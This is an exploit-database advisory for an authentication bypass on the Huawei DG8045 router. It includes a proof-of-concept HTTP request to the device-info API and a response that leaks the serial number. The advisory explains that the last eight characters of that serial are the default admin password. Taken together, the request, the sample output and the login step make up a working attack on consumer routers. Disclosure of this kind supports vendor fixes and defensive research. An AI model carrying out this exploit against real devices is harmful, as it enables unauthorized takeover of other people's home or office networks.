Huawei dg8045 Authentication Bypass

2021.06.24
Credit: Abdalrahman Gamal
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: Huawei dg8045 - Authentication Bypass # Date: 2020-06-24 # Author: Abdalrahman Gamal # Vendor Homepage: www.huawei.com # Version: dg8045 # Hardware Version: VER.A #POC: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. An attacker can leak the serial number via the web app API like the following: ************************Request************************ GET /api/system/deviceinfo HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.1/ X-Requested-With: XMLHttpRequest Connection: close ************************Response************************ HTTP/1.1 200 OK Cache-Control: no-cache, no-store, max-age=0, must-revalidate X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Date: Thu, 24 Jun 2021 02:07 GMT+2 Connection: Keep-Alive Content-Language: en Content-Type: application/javascript Content-Length: 141 while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/ You can use that serial number last 8 char/digits to login to the router.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top